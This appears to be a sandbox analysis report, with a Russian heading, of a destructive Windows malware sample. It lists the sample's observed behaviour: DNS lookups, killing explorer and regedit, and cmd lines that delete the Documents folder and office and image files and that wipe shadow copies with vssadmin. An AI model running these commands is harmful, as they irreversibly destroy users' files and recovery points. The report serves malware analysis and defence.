Техническая информация
- '%WINDIR%\syswow64\taskkill.exe' /f /im explorer.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im regedit.exe
- %WINDIR%\explorer.exe
- <Текущая директория>\congratulations.txt
- <Текущая директория>\congratulations.txt
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
- DNS ASK yo##ube.com
- DNS ASK s.##img.com
- DNS ASK fo###.gstatic.com
- DNS ASK accounts.google.com
- DNS ASK ss#.#static.com
- DNS ASK oc##.#tartssl.com
- ClassName: '' WindowName: ''
- ClassName: 'DDEMLMom' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c echo off
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im explorer.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im regedit.exe
- '%WINDIR%\syswow64\cmd.exe' /c start https://www.yo##ube.com/watch?v=###########
- '%WINDIR%\syswow64\cmd.exe' /c RD /s /q %UserProfile%Documents
- '%WINDIR%\syswow64\cmd.exe' /c MD %UserProfile%Documents
- '%WINDIR%\syswow64\cmd.exe' /c RD /s /q C:WindowsMinidump
- '%WINDIR%\syswow64\cmd.exe' /c DEL /s /q *.DOC *.DOCX *.xls *.xlsx *.png *.txt
- '%WINDIR%\syswow64\cmd.exe' /c vssadmin delete shadows /all /quiet
- '<SYSTEM32>\vssvc.exe'